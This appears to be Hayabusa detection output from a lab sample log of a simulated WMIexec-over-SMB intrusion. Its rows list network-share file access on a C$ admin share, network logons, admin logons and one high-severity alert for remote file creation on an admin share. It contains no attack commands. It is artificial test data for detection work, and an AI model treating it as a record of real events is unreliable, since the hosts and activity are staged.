Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.240 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.256 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.257 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Documents : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,high,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63565 : LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63566 : LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63567 : LogonID: 
0x18c336,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.140 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.179 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.195 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 
